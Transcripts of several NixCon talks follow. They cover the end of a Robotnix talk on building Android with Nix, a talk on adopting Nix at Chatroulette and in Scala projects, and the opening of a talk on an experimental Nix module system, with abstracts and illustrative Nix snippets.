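  /nix/store/...-robotnix-target-files
```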
Both Soong and the makefiles — the latter through the ckati tool — produce Ninja files, which are then combined, and that's what's used to actually build the whole thing. But here I want to focus on the newer part: Soong and the Blueprint files. Let's look at an example of what a Blueprint file looks like. Here they're building a binary called ext2simg using the cc_binary Soong module — a module that builds binaries from C or C++ source code. I'll point your attention to the sources: it's a list of sources, here just one .c file, and then a list of shared libraries — libraries that are defined in other Blueprint files throughout the source tree. If you squint hard enough, you'll notice that this sort of looks like a Nix expression, right? Maybe if you got rid of the colons, added equals signs and semicolons, it would look a little bit more like Nix. And maybe if you assigned this to a variable, wrapped it in a let block, and added a function header where you can pass in cc_binary, you could turn these Blueprint files into Nix files that could then be evaluated by the Nix package manager. That's what the blueprint-to-nix utility does: I actually modified the Blueprint formatter — the pretty-printer — to output Nix files based on Blueprint files. However, you still have the problem that you have to implement the actual module, such as the cc_binary module. So I did a partial implementation of some of the modules, the cc_binary and cc_library modules in particular, and I can actually build some of these Android modules entirely in Nix, at the derivation level — instead of a single derivation for the whole thing, you have a derivation for each binary and each library. I can build the adb and fastboot utilities using the native Clang toolchain from nixpkgs, even on arm64, which is quite nice because Google doesn't even publish native arm64 binaries for adb and fastboot.
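To make the transformation he describes concrete, here is an illustrative Blueprint module (shown as comments) and the kind of Nix expression it would mechanically become — a sketch, not the actual output of his tool:

```nix
# Soong Blueprint original (illustrative):
#   cc_binary {
#       name: "ext2simg",
#       srcs: ["ext2simg.c"],
#       shared_libs: ["libext2fs", "libsparse"],
#   }
#
# After swapping colons for '=', adding semicolons, and a function header:
{ cc_binary, ... }:
cc_binary {
  name = "ext2simg";
  srcs = [ "ext2simg.c" ];
  shared_libs = [ "libext2fs" "libsparse" ];
}
```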
So already we have a bit of improvement there, and there are great benefits from using Nix here. Obviously laziness is great, but the bigger thing is that the derivations depend only on the source files they explicitly reference, so you need to download only a very small portion of the overall source tree to build some of these utilities. This is in contrast to the way it normally works, where you have to download the whole thing just to build a very small part. I'll point out this is really a proof of concept and probably not maintainable for all of Android — if you wanted to build all of Android this way, it would take more than just me to implement all of the Soong modules and keep them up to date. But maybe you could do this for just the binaries intended to run on the host, like fastboot and adb, and maybe that's something that could be in nixpkgs someday. And maybe this points the way to a potential future bazel2nix or buck2nix — a lot of other recent build systems operate in similar ways to Soong, and potentially you could convert them to Nix as well. Just for fun, I put a lot of these derivations in Hydra and built a ton of things to see how much would work. As for the final goals: I'd like to set up some continuous integration to ensure that I'm not breaking Robotnix in the future. I'd also like to have a NixOS module or something that integrates with these Robotnix configurations — at the very least, to automatically set up an update server that hosts the metadata and the OTA files. And finally, I've been using this on my own phone — my daily driver — since July of last year, and I haven't lost any data; I haven't had to wipe or reflash this phone; I've only used the over-the-air updates. So I intend to keep following the monthly releases that Google provides, to keep it secure and up to date.
So at this point I'm trying to work on making Robotnix useful for other people and not just me — a lot of that will have to do with documentation — and if anyone is interested, at NixCon over the weekend I'd love to hear any feedback about pain points or things I could improve in Robotnix in the future. I was also happy to get some very good news earlier this week: my proposal to the NLnet Foundation, under their NGI0 initiative, was recently accepted. So I'm hoping to be able to do some funded work on Robotnix in the future. At this stage we still need to define some concrete milestones, but it looks like it's passed the internal and external review process, so I'm very, very excited for the future of Robotnix. And of course I'd encourage you to try it out for yourself — go check it out at github.com/danielfullmer/robotnix. I'd also encourage you to check out any of these related projects, which were great inspirations for me — I owe a lot to these projects. And that's the end of my talk; I'm happy to answer any questions you might have. Okay, that was Robotnix: Build Android AOSP Using Nix, and this is the Q&A session with Daniel. Unfortunately, since the talk ran a little over, we probably only have time for one question, and then you'll have to continue in the breakout rooms. So let me read the first one. The very first question we have is from Edith, and it says: given that the signing is done in a derivation, do the signing keys end up in the Nix store? So that's a great question, and the answer is no, they don't end up in the Nix store — but there are a couple of things you have to do to ensure that's the case. I have two options for how you can go about the final signing steps, one of which generates a release script that operates outside of Nix and performs the final signing step.
And the other option is within Nix, but you have to enable a certain sandbox exception to allow access to the directory containing your keys. Okay, thank you. I guess that concludes the Q&A session — I am sorry about that.
Robotnix enables a user to build Android (AOSP) images using the Nix package manager. AOSP projects often contain long and complicated build instructions requiring a variety of tools for fetching source code and executing the build. This applies not only to Android itself, but also to projects which are to be included in the Android build, such as the Linux kernel, Chromium webview, MicroG, other external/prebuilt privileged apps, etc. Robotnix orchestrates the diverse build tools across these multiple projects using Nix, inheriting its reliability and reproducibility benefits, and consequently making the build and signing process very simple for an end-user.
10.5446/50716 (DOI)
Okay everyone, we just decided to push the schedule forward to the third talk — I am sorry about that. So with that out of the way, our next speaker is Gabriel Volpe, and this talk is called Nix at Chatroulette. This talk is going to interest people who would like to make their job, and the lives of people at their workplace, better using Nix — and who'd also like to convince their employer and colleagues that using Nix is a good idea. Gabriel is going to go through their experience of doing exactly this while working at Chatroulette. Some factoids about Gabriel: they are a highly active contributor to open source — their GitHub handle is @gvolpe, with a total of 2.4k commits — and they're the author of a book, Practical FP in Scala: A hands-on approach. As you've probably already gathered, Gabriel is a software engineer, currently employed at Chatroulette. Okay, you can take it away, Gabriel. Paul, thank you very much for the nice introduction. It is a pity that you cannot see my face, but I think that's probably better for you. So the talk today is going to be about two major topics. The first one is how we introduced Nix at work, what needs we had, and how we currently use it. The second part of the talk will be more focused on the Scala ecosystem — Scala, for those who don't know, is a JVM language, kind of a hybrid functional programming language. So, two major topics for this talk. Experienced Nixers are probably not going to learn too much from this; the target audience is mainly every company out there writing software — or making software, actually. Ideally they'll already be using Nix, or I can persuade them to give it a chance and see how it can help.
A little bit about myself — even though I was already introduced pretty well: I currently work at Chatroulette. We mainly write Scala, but I consider myself a functional programmer. I wrote this book called Practical FP in Scala, and I love Nix — that's why I'm here talking to you today. My Twitter and GitHub handles will be there in the slides for the rest of the talk, so feel free to ping me there; I'm also on the Discord chat for the rest of the conference. So: how we introduced it at work and how we currently use it. It all started because we had a somewhat messy situation. I joined the company early this year, and it all starts with a basic need. Basically, we have a monorepository with the whole project that makes up Chatroulette. The backend, as I mentioned before, is mainly written in Scala, which is a JVM language, and we use Docker Compose to run a few dependencies like Postgres and Apache Pulsar, which is at the core of what we do. We have TypeScript mainly on the frontend, which I guess runs with Node.js and npm — I'm not very familiar with that part; I only use it sometimes. The whole infrastructure tools and software run mainly on Kubernetes, on an Istio service mesh, and so on. And we have a bunch of people writing code on different platforms, mainly Linux and macOS — luckily not Windows. So on my first day at the company, I spent all day in different meetings and talks — because I joined remotely — trying to figure out all the software needed to actually run the project, and all the dependencies needed for the frontend and the backend. There's also a mix of software needed whenever you need to run the cluster as it runs in production, like Kubernetes and the service mesh and all that stuff.
There is a lot of stuff to take in, and I think this was also my experience at previous companies not using Nix: pretty much everybody expects you to figure out all the software you need to run the project locally and be productive. So that's what I found at the beginning, and the idea was: okay, this is a very good use for Nix — at the very least, let's manage the dependencies we need to run the project locally, both for the backend and the frontend, and whenever we need it for infrastructure, and let's see how it goes from there. So I introduced, at first, a shell.nix with a bunch of dependencies that we needed, and made it work for both Darwin and Linux. Nowadays we have something like this — this is just a minimal example; what we actually have is a bit bigger. We have a few other modules, and some custom derivations that we had to build specifically for our needs. But the advantage was very clear to everybody on the team. In order to introduce it, I only gave a small talk: I shared my screen and showed people what Nix is, how it works, and what its benefits are. Everybody was pretty much sold on using Nix — I think it's easier when you introduce it to a group of functional programmers who actually value immutability and reproducibility. But still, everybody was new to Nix, and it was accepted in the spirit of "let's just give it a try". So this is what we have nowadays, and it has been very good for the rest of the team and for everyone, specifically because a new developer joining the team only needs to do a few things on day one. The only requirements are to have Git installed, Nix, and Docker — Docker needs to run as a daemon with some extra permissions, so we cannot provide it in our Nix shell. But other than that, this is all they need to do: in the first box, basically git clone the project, enter a nix-shell, and run a shell script we have.
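The slide isn't reproduced in this transcript, but a minimal shell.nix of the kind he describes — a pinned nixpkgs plus the backend, frontend, and infrastructure tools — might look like this (the pin URL and package list are illustrative, not Chatroulette's actual file):

```nix
# shell.nix — minimal sketch of a pinned development shell
let
  pkgs = import (fetchTarball {
    url = "https://github.com/NixOS/nixpkgs/archive/nixos-20.09.tar.gz";
    # sha256 = "..."; pin the hash in a real setup
  }) { };
in
pkgs.mkShell {
  buildInputs = with pkgs; [
    jdk11 sbt   # backend (Scala on the JVM)
    nodejs      # frontend (TypeScript)
    kubectl     # infrastructure tooling
  ];
}
```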
It starts the whole project if you want to run it locally. So that's all they need to do — and we actually encourage our team to use direnv. For those who don't know direnv: basically, you enter a directory and all the dependencies declared in your shell.nix are automatically made available to you, provided you run the commands in the second box. We leave this optional in the company — we don't force anyone to use direnv, because it takes a few extra steps to set up at first — but we encourage pretty much everyone to use it, because you don't need to remember to run nix-shell before running the other commands. Sometimes it's "why is the build tool command not available to me?" — "oh, did you run nix-shell or not?". So we avoid having to remember whether a user is within a Nix shell or not. The benefits have been huge. Now we have reproducible development environments for both Mac and Linux users, and everybody runs the same exact version of the dependencies. There is very, very little maintenance: we update dependencies from time to time, whenever the need arises. Everybody learned how to update dependencies and how to update the hash of the pinned nixpkgs version, because we have nixpkgs pinned to an exact version. People even got familiar with the sha256 hashes, because whenever we update some custom derivations, they also need to update the hash — and that's pretty much what everybody does. So for very little investment, the outcomes and the benefits have been huge for us. I would definitely recommend development shells — I think they're the killer feature of Nix. You can do a lot of things with Nix, but I think this is the best-selling feature, and everybody out there could be leveraging it. So, definitely recommended.
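The direnv setup he mentions amounts to a one-line .envrc in the project root (after installing direnv and its shell hook):

```shell
# .envrc — direnv loads shell.nix automatically when you cd into the directory
use nix
```

followed by running `direnv allow` once to authorize it.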
Another use case we have: since our microservices are all written in Scala, the build output is a JAR that needs to be run by Java — so it has a Java dependency. We generate the base Docker images to build upon using Nix as well. Here on the left you can see the docker.nix file — it's very, very small — but what we get is a guarantee that the Java version we declare in our Nix file is the same one that runs in production. I mention this because I've been writing code on the JVM for about 10 years, and it is a very common problem: many developers just run different Java versions, whatever comes installed with their system. Even with the same major version, you can have issues with different minor versions. It happened to me a couple of times in the past that a different version was running in production and we had runtime issues — because we compiled with one version but it ran with a different one, even if the change was only in the minor version. By guaranteeing that the Java version you use to compile and write code locally is the exact version that runs in production — by creating this Docker image using Nix — we get another benefit: no more discrepancies between the Java versions running in production and on your local machine. We have a few other projects that also require extra packages — for example, Tesseract, which is a C/C++ library for doing OCR — and that's why we have this extra flag, but that's pretty much how we use it. Since we also have the shell.nix with all the dependencies needed for deployment, we use that in our CI build as well, mainly running the nix-shell and nix commands. We use GitLab runners — our repository is hosted on GitLab.
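A docker.nix along the lines he describes — pinning the JDK into a base image so production runs the same Java as development — could be sketched with nixpkgs' dockerTools (the image name is illustrative):

```nix
# docker.nix — base image containing the same pinned JDK used in shell.nix
{ pkgs ? import <nixpkgs> { } }:
pkgs.dockerTools.buildLayeredImage {
  name = "chatroulette/jdk-base";  # illustrative image name
  tag = "latest";
  contents = [ pkgs.jdk11 ];
}
```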
So this is all we have in our production code at the moment, but taking into consideration that this started only a few months ago, I think we've made very good progress — and we're still delivering business features, which always have the highest priority. So that's the first part, and I want to encourage everyone out there not yet using Nix to give it a try, at least for development shells. That really is a killer feature: you get reproducible development environments, and newcomers can be creating pull requests on day one, without wasting time figuring out what dependencies they need to run your project. We also have a few open-source projects that we maintain, hosted on GitHub instead. I mentioned before that we use Apache Pulsar — a distributed message broker — and we maintain two client libraries, one for Scala and one for Haskell, and we use Nix in both projects. Today I'm going to focus on Neutron, which is the Scala client, because I want to continue talking about the Scala community and Nix. Whenever people start using Scala and try to use Nix in a Scala project, they'll do something like this: for example, pinning nixpkgs to a specific version and just creating a shell with a specific Java development kit — JDK 11 in this case — and sbt, the Scala build tool, which is the most standard build tool in Scala. That's how people might start, and it's actually how I started when I was learning Nix. Then we run sbt and we get a message like this, and say: hold on, why is Java 1.8 in there when I actually want JDK 11? This always comes as a surprise to everyone — I know it was a surprise to me as well — but it actually makes sense if you think about it.
sbt gets packaged in nixpkgs, and it needs to be packaged with all its dependencies. sbt depends on a Java version: in order to build a reproducible sbt binary, we need to know which version of Java it runs on. There is a default version in nixpkgs; in this case it's Java 1.8. Overriding the default version is very easy. You do something like this, basically sbt.override with a specific Java version. We have something like this at the moment: we parameterize over the Java version and we override the sbt package. Then we have a shell.nix which also takes an argument for the Java version. It defaults to JDK 11, but it can be overridden by just passing it as an argument. The next time users run sbt, they are welcomed by sbt with the specific Java version we want to run. That's it, that's one thing. We also use Nix in this project on GitHub Actions. The benefits are, again, that we can use the same Java version we use for local development in the CI build. And since we have parameterized our shell.nix over the Java version, we can compile and run the tests for our project with multiple Java versions. On GitHub Actions this runs three different jobs in parallel for the different Java versions, in this case 8, 11, and 14. If you pay attention to the last command, which is a nix-shell invocation at the end, it actually invokes nix/ci.nix. That is basically the same as shell.nix, except it only has sbt as a dependency, because we don't need more in the CI. When it runs, it runs three parallel jobs like this. We run Apache Pulsar, which is exactly what we do locally as well, and then the rest runs using Nix. I think this one is a very cool use case. Unfortunately we cannot use it at work, because we use GitLab and GitLab runners, but I really love GitHub Actions as well, so we use this for our open source projects. We use Cachix as well.
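The override described here might be sketched as follows. It relies on the sbt package in nixpkgs accepting a `jre` function argument; the parameter name `jdk` and the defaults are illustrative:

```nix
# Parameterized shell.nix: the JDK can be swapped from the command line,
# e.g. nix-shell --arg jdk 'pkgs.jdk8' (assuming pkgs is in scope there).
{ pkgs ? import <nixpkgs> {}, jdk ? pkgs.jdk11 }:

pkgs.mkShell {
  buildInputs = [
    jdk
    # sbt in nixpkgs takes its JRE as a function argument, so .override
    # lets us run sbt on the same JDK we develop and deploy with.
    (pkgs.sbt.override { jre = jdk; })
  ];
}
```

Because the whole shell is a function of the JDK, a CI matrix can evaluate it once per Java version, which is what produces the three parallel jobs mentioned above.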
You might have seen it there in the GitHub Actions declaration. The thing is, we override the Java version for sbt with multiple Java versions. If you have a file like this, an sbt.nix, and we override it with three different Java versions, then this creates three different sbt binaries with different hashes. We can cache these binaries and pull them from the binary cache in the CI build, as well as on different machines, so developers don't have to build them again. Thanks to Domen for creating Cachix; it's actually free for open source projects. It's awesome. That's what we do: we don't have to rebuild sbt, and it improves the CI build times. That's pretty much a little tour of the Neutron project that we run. Now I want to talk a little bit about how Nix is perceived in the Scala ecosystem, how many users are using Nix, and what the current status is. JVM languages in general don't get along very well with Nix; there's a reason, I guess, the JVM ecosystem is huge. There is another talk at the end of the day by Farid about Java and Nix, which I'm looking forward to hearing. But recently I ran a Twitter poll focusing just on the Scala community, asking Scala people whether they use Nix in their Scala projects, and the results speak for themselves. There were more than 300 votes; most of the people don't use it, and a high number of people don't actually know what Nix is. The results are a little bit sad, but I actually want to change this. I'm trying to create more awareness of Nix in the Scala community, which is where I believe I have a bigger voice. There were a few attempts to Nixify Scala projects using sbt, these two projects, sbt2nix and sbtix, which are really ambitious. They try to create a lock file with all the dependencies, but it's actually very complicated. sbt is very complicated, the whole JVM ecosystem is complicated, and Scala makes it even more complicated.
Unfortunately, both projects seem to be abandoned today. I actually gave them a try a while ago and it's hard to get them working. They seem to work on small projects, but whenever you have a complicated setup, which is most of the time the case for Scala projects, they fail to build, and they are not actively maintained. Hi, Gabriel. Just one moment. I just want to mention that you are actually in your Q&A time, just so you know. Sorry? Oh, there is still a bit of talk left. Sorry. It's okay. Since we have extra time, we can allocate an extra five minutes to the Q&A if it's okay with you. Yeah, I actually didn't get any notification for that. I'm sorry. I was in the chat. Okay, sorry. Christine? Do you have two more minutes to finish the talk then? Sorry? Basically, the five minutes you can take now, since we added an extra five minutes to the Q&A because of the talk. Okay, sorry, I didn't see the message. I wish I could finish. Okay, you have five minutes now. Oh, it's nearly at the end. All right. You can continue your talk, actually. I hope you understood that. You can actually continue; we have extra time. Okay, I'm sorry. Okay, trying to finish quickly. There is another project that I came across recently, by Francesco Zanini. It's called sbt-derivation. It is not so ambitious: it only creates a dependency hash, like two derivations, one for the whole tree of dependencies and another derivation for the project itself. It seems to work pretty nicely. There are a few areas where it could be improved, like actually leveraging caching and such, but it works and it's actively maintained at the moment. Because of the Twitter poll results, I wanted to create more awareness of Nix in the Scala community, so I started creating this guide, which is also a giter8 template. giter8 templates are the common way to create new Scala projects. It tells a little bit about Nix and how it can be useful for a Scala project.
All users need to do is run this command, and they will have a project with an opinionated Nix setup, so they can build the project using sbt-derivation, as well as create Docker images. They also get all the setup for running on GitHub Actions using Nix and Cachix. I'm out of time, but you can try this out at home if you're interested. Thank you all for listening, and I'll be taking any questions. You have one question that I can give to you right now, if that's okay? Yeah. Okay, so from LambdaDoc on IRC: how do you build Docker images from Mac machines, if you do? From Mac machines, from Darwin, I mean. I believe that's what the question is about, macOS. Well, I don't know. I never used a Mac in my life and I never will. Oh, okay, okay. But yeah, we use Linux and we build the Docker images in the CI build. I think it should work on macOS too, but I don't know. I would need to check with my colleagues to see how they do it, but I guess they just run nix build the same way I do. Right, right. Okay, I don't see any more questions. Wait. Okay, then I'll stop sharing. We have, I think we might have one more question. So what was the most surprising part of introducing Nix in your infrastructure? I think we have time for one more question. At work? I'm sorry, your audio just went away. Could you repeat the question? Yeah, okay. So what was the most surprising part of introducing Nix at work, if you can answer that question? The most surprising part of introducing Nix... well, I don't know if it was surprising. It wasn't really surprising to me, because I was already using Nix for my open source projects. Then what surprised your coworkers the most, maybe? I think there was no surprise. Everybody liked it, and I think you only need one person to take the lead and actually promote the usage. If everybody is happy with it, then that's it.
But yeah, I don't think anybody was surprised. I think they were... Oh my God, you're incredibly lucky. Other people have a much, much harder time. Yeah, I believe so. As I said before, when you introduce something functional, which promotes reproducibility and immutability, to a group of functional programmers, I don't think there is a huge surprise, because we are used to writing functional programs and we know the benefits. So it actually fits in pretty well. Right. If it were people who work with Python, would it have been a different situation? I think that would be a big shock, or at least there would be a bigger surprise. It could be the first functional programming language for some people. Yeah, exactly. I don't know, I don't have experience with other languages that are not functional. Okay, I think that's out of time. So thank you so much for being available early, since our other speaker wasn't able to make it. You really did save us being able to do that. So we have to cut to a 25-minute break or something. No worries. Thanks, and sorry for not checking the chat; I was actually really lost. We were just looking at the slides. Oh, your slides and your presentation were great, so I think you were doing that to help you focus. It's okay. Okay, I'll share the slides anyway on Discord and on Twitter. I will also tell you about the breakout rooms; as you might have heard before, we're going to force you into them. So your room key for your breakout room, if there's any discussion (and if there isn't, I guess you can just leave), is just "chatroulette" at this instance. Okay, no worries. Well, thank you very much for organizing this. I know it's not easy. Yep, it definitely isn't, but it's very rewarding. Okay, with that out of the way, we have some announcements. So from our moderator, we have a change in asking questions.
So if you're going to ask a question during the Q&A portion, you need to join the NixCon Q&A room and ping Nbotham with your question. And I don't think we have any other announcements besides that. So yeah, we're going to go to a five-minute break until the next talk. We'll see you all then. Okay.
People already familiar with Nix already know its benefits but what is the best way to tell others what they are missing out on? How do you convince your employer and colleagues that using Nix is a good idea? Let me tell you how I did it at Chatroulette and show you that you can easily do it at your company too. The main programming language at Chatroulette is Scala, a hybrid OOP-FP language that runs on the JVM, even though we only make use of the functional subset. We run the entire system on Kubernetes (Istio / Envoy) and deploy our microservices as Docker containers. Introducing Nix in such a big system - running on different platforms - might not seem trivial but you would never know if you never try! The talk will also touch on the current state of Nix in the Scala community. How many use Nix? How many don't know what Nix is? What can we do better? The ultimate goal of this talk is to give you the itch to at least think about introducing it at your company.
10.5446/50717 (DOI)
Okay, we have our first talk here. This talk is called Nix Modules: improving Nix's discoverability and usability. Our speaker today is none other than Eelco Dolstra. I think he's honestly someone who doesn't really need an introduction, because he is the creator of Nix. So let me go over the topic of this talk. This talk is about Nix's configuration language, which is very powerful but suffers from a lack of discoverability, usability and consistency. In this talk, Eelco is going to describe an experimental Nix module system that provides a consistent, discoverable mechanism to write configurations such as packages and NixOS systems, and show how this enables a better user experience for both new and advanced users. And I will say that Eelco's current work setup is that he is a senior engineer at Tweag I/O, which he joined in 2018. Okay, great. Eelco, take it away. All right. Can you hear me? Okay. Okay, great. Yeah. Let me start my screen sharing. So unfortunately, it appears that in Jitsi you cannot share a screen and video at the same time, at least not without the video becoming horribly blurry. So sadly, you won't be seeing me for the rest of the talk. Okay, so in any case, thank you all for that. Thank you, worldofpeace, for the introduction, and a big thank you to all the organizers. So yeah, of course, a slight downside compared to a physical NixCon is that I have no idea who I'm talking to, whether I might be talking to a void, but I'll just imagine that all of you are here. Yeah, so this talk is about... Eelco, just to interrupt you one moment. It seems that, at least with our infra, I cannot actually see your slides and your screen share. So do you think you could toggle that on and off? I'm sorry, everyone watching. Yeah. Okay, so tell me when you toggle that again and I will get a confirmation that they can see it. Okay, give me one second. I have toggled it. Can you please check the second slide? Yeah.
The talk shows on the live stream. So now on the second slide. Okay, I believe that your screen sharing is working. You can go to the first slide and begin your talk. I'm sorry about that. It just doesn't appear to me, but it is working on the live stream. Okay, proceed. Okay, well, I'll monitor the comments here. So yeah, just let me know if it stops working. Okay. So yeah, this talk is about a bunch of brainstorm sessions we've had, or I have had together with a couple of other people, in particular Rok Garbas, on how to make Nix more beginner friendly and more user friendly. Now, a warning: there is quite a lot of vaporware in this talk. Most of the things I'm describing actually do exist; there is a sort of proof of concept of the things I'm going to talk about, but it's very far from being ready for actual use, let alone merging. So this is all an exploration of some ideas on how to make Nix more user friendly in various ways, but it's very far from being in a state that you can actually use. Okay, with that said, let's talk about what the problems are with Nix currently. Nix is, of course, awesome, but it's not very beginner friendly. There's a very steep learning curve. You have to learn all these new concepts like immutability and the Nix store and Nix expressions in particular. That's the big one: it is a kind of strange language that you need to learn, especially if you're not familiar with functional programming. And yeah, that's a steep learning curve, and probably a lot of people never get over that curve, so they just go away and give up. So maybe we can improve that. The second issue is that even if you are over the hurdle and you're an advanced user, there are actually a lot of things about Nix that are just not that great to use. Nix is wonderful in how possible it makes it to adapt packages and configurations.
So there's probably no other package manager where it's even possible to just say: I'm going to rebuild my entire system with a patched version of GCC. Or: I'm going to set up a developer shell with these packages, in some random combination, with some patches applied, compiled with these compiler versions. I mean, that's really great about Nix. But those configuration mechanisms are for the most part not easily discoverable. You basically need to Google them to find out that they exist and how you use them. Yeah, another problem is that there are actually a bunch of configuration mechanisms and they all work in slightly different ways, and they're often not very easy to use. So what can we do about this? In this talk, I will discuss adding a more uniform... sorry, that was a comma. So yeah, we're going to try to provide a more uniform and discoverable configuration mechanism, make things more discoverable from the command line, and, maybe this gets a bit controversial, provide a simpler configuration language like TOML for simple projects. That would make the hurdle a bit smaller for beginners. So, a quick look at the configuration mechanisms in Nixpkgs and what the problems are. You have function arguments, .override, config, overlays, NixOS modules. All these things have grown organically over time and they all serve slightly different use cases. But it's not clear, for instance, why for NixOS we use these modules and for packages we use this function-argument style of configuration. In particular, the function-argument style: that's the style where you write packages as functions that take a bunch of arguments, like the dependencies and user-configurable things like CUDA support. So this is the Nix expression for Blender, in which you can enable CUDA support.
So if you build this thing... yeah, if you want to have Blender with CUDA support, there's actually no way to find out that this option exists except by reading the source of this Nix expression. It's not discoverable at all. And once you have discovered that the option exists, maybe by Googling "how do I enable CUDA in Blender", you can't actually use it from the command line. You might think that something like nix build blender --arg cudaSupport true does the right thing, but it doesn't, because that argument doesn't get propagated all the way down. Other problems: there's no type checking, and it's kind of ugly that it mixes user-facing configuration with dependencies. So this is not a very great configuration mechanism. Then we have .override. I won't go into details, but .override is another of these things that grew organically. It has all sorts of problems. It's inefficient, because under the hood it calls a function twice just to get this .override function, and it leaks memory. So if you're wondering why Nix evaluation takes multiple gigabytes, well, this is one of the reasons. Yeah, then there is the Nixpkgs configuration file. You can put things like this inside a config file. But again, it's not discoverable, there's no type checking, and it's not obvious how you use it from the command line. So yeah. Then, finally, there are overlays. Overlays are great, but the syntax is kind of mysterious, and it's also not obvious how things like nested overrides work. If you want to override something at top level, it's easy; if you want to override something deep down, like in Python packages, it's not obvious how it works. And then there are NixOS modules. NixOS modules are great, they're awesome. They basically tick off most of the boxes. They're discoverable: you can just type man configuration.nix. They have documentation, they have types. I mean, there are some problems.
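To make the function-argument style concrete, here is a stripped-down sketch in the spirit of the Blender example; it is not the real Nixpkgs expression, and the version, URL, and hash are placeholders:

```nix
# Illustrative only: a package whose lone configuration knob is a
# function argument, invisible from the command line.
{ stdenv, fetchurl, cudaSupport ? false, cudatoolkit ? null }:

stdenv.mkDerivation {
  pname = "blender";
  version = "...";
  src = fetchurl { url = "..."; sha256 = "..."; };
  # The option only shows up here, deep inside the expression:
  buildInputs = stdenv.lib.optional cudaSupport cudatoolkit;
}
```

Flipping the flag then requires the hard-to-discover `blender.override { cudaSupport = true; }`, which is exactly the discoverability problem being described.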
They're entirely a library feature, so Nix, the command line tool, doesn't know anything about them. You can't easily query NixOS options from the Nix command line, or set options, or do things like that. So okay. As a solution, since NixOS modules are so great, maybe we can just use NixOS modules everywhere: turn NixOS modules into a language feature, maybe make some improvements, like cleaning up the syntax and semantics, and then use them everywhere. So instead of, for instance, having functions that create packages, we can have modules that create packages. Here's an example of what that looks like. This is a module that builds Hello World. If you know NixOS modules, the syntax is probably familiar. We would probably actually want to improve this syntax if we really turn this into a language feature, because then you're no longer confined by these weird constructs, like having config as a function argument and as an attribute name. But apart from that, it should look familiar. What this module does is extend a bunch of other modules, like stdenv. In this modular world, we no longer have a function called stdenv.mkDerivation; instead, stdenv is a module that you can extend or inherit in your own modules. And that should, in theory, make it easier to combine modules. For instance, if you have a package that includes both Rust code and Python code, you could just include the module for building Rust and the module for building Python. So what this module does is say Hello World by default, but the text of the greeting is configurable at compile time. It has a who option that you can set at build time, and that option is used in the configuration of this module. The configuration sets a bunch of options that it inherited from the stdenv module and the package module, like the package name, the version, and the build script, and that build script then generates a Hello World binary.
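A purely speculative reconstruction of such a module, based only on the description above, might look something like this. The syntax is experimental and unsettled, so every name here (`extends`, `options`, `buildScript`) is an assumption:

```nix
# Speculative sketch of a package-as-module; not real, working syntax.
{
  extends = [ stdenv package ];   # inherit options from other modules

  options.who = {
    description = "Who to greet at build time.";
    default = "World";
  };

  config = {
    pname = "hello";
    version = "1.0";
    # The inherited build-script option would use the `who` option.
    buildScript = "generate a greeter binary for \${config.who}";
  };
}
```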
All right. So how would you use this? Well, basically the same as how you use Nix now. And, by the way, I should mention that this is intended to be part of a flake, so modules.hello would be a flake output. Just as a flake can have packages now, it can have modules. So if you say nix run hello, that will build the hello module from the flake in the current directory and run it. And that's actually equivalent to building and running modules.hello.final.derivation. And derivation is an option inherited from one of these modules that we're extending, like stdenv, that evaluates to a derivation graph. So just like in NixOS you have an option called system.build.toplevel, which builds your entire system, here we have an output option called derivation, which returns the derivation for your package. The whole point was to make things discoverable, and now we have that, because we have a standard structure and we have options that have descriptions and types. Actually, we don't have types yet, but we could have them, just as in the NixOS module system. So yeah, we can discover via a command, nix list options, which will show us all the options in this package. For instance, this is how we discover that this thing has a who option. And then we can override this from the command line. We can, for instance, say nix run hello and override who to NixCon, and that will build a new derivation and run it. Now you might be thinking: aren't flakes supposed to be hermetic, so you can't actually override something inside a flake? What this actually does is construct a new flake on the fly, in a temporary directory, that imports the flake in the current directory. So it basically generates something that looks like this, which is what you would write yourself if you were trying to extend the module. You could have a flake with a module named myHello that extends the hello module and sets who to NixCon.
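A hypothetical version of that generated extension flake, again with speculative syntax, and with the input URL deliberately left unspecified:

```nix
# Roughly what `nix run` would generate in a temporary directory;
# attribute names and the extends mechanism are guesses.
{
  inputs.hello.url = "...";   # the original flake

  outputs = { hello, ... }: {
    modules.myHello = {
      extends = [ hello.modules.hello ];
      config.who = "NixCon";
    };
  };
}
```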
So this is basically the replacement for the .override or .overrideDerivation mechanisms. Another nice thing to mention is that we now have a standardized documentation mechanism. There is a command called nix doc that, given a flake, generates the documentation for that flake, just like cargo doc. It actually uses mdBook, which is also what cargo uses. It takes all the markdown doc strings of all the options and modules and generates documentation out of them. The goal here is to have a standard, uniform documentation mechanism for all flakes, so in the future you should be able to say nix doc on any flake and get documentation out of it. All right, a final thing to mention is beginner friendliness. If I go back two slides: in this Nix expression, there's a lot of mysterious code, like this whole self/hello stuff, this config thing over here. That might be daunting for new users. And in fact, it's kind of unnecessary, because modules are really just name-value pairs, like who = NixCon. So you don't need the whole Nix expression language just to customize a module. The idea is that you can just write a TOML file. You still have to declare your flake dependencies, but then you can just say who is NixCon (and of course that we're extending a certain module), and that's it. So yeah, you could have a more user-friendly syntax. And another advantage of a simpler syntax like TOML is that it is easier to generate, so we can have a command line mechanism to modify a flake. We can just provide a command to set options or add dependencies to a Nix shell or things like that. And that's less error-prone than telling new users that they need to edit a Nix expression and get the syntax exactly right. So that's the idea. All right, so that's it, actually.
So the next steps that we're interested in are, well, actually trying to improve the syntax and semantics of this toy module system, because right now it's an extremely bare copy of the module system that NixOS has; it has no types or merge functions or anything like that. So we'd like to come up with a better syntax and semantics and improve on the NixOS module system. For instance, it would be great to have proper scoping: a module should not be able to access options that it hasn't explicitly inherited from another module. And of course, we'd need to do a lot of experiments to see whether any new mechanism actually meets all the current use cases for the existing configuration mechanisms, stuff like overlays or package sets. We need to see whether we can actually do that. Okay, so yeah, there is a proof of concept implementation that contains all these commands like nix doc and nix list options, so you can actually play with it, but it's very bare at this point. There are actually some examples that you can check out, and there is a document somewhere that has more ideas about these language changes. All right, that's it for this talk. I understand I can now answer questions, so I need to figure out where I can actually see the questions. Hi, so I will just read those off to you. You are running early, so your Q&A will actually have two extra minutes if you want. Okay, let me read the first one we have in the pad. This is from Andy on FreeNode. It says: what is the cost of having more features that other languages already have built into Nix? Sorry, can you repeat that? I didn't quite catch it. Okay, I can repeat that. What is the cost of having more features that other languages already have built into Nix? What is the cost? Well, obviously there is a cost in terms of: we have to implement it.
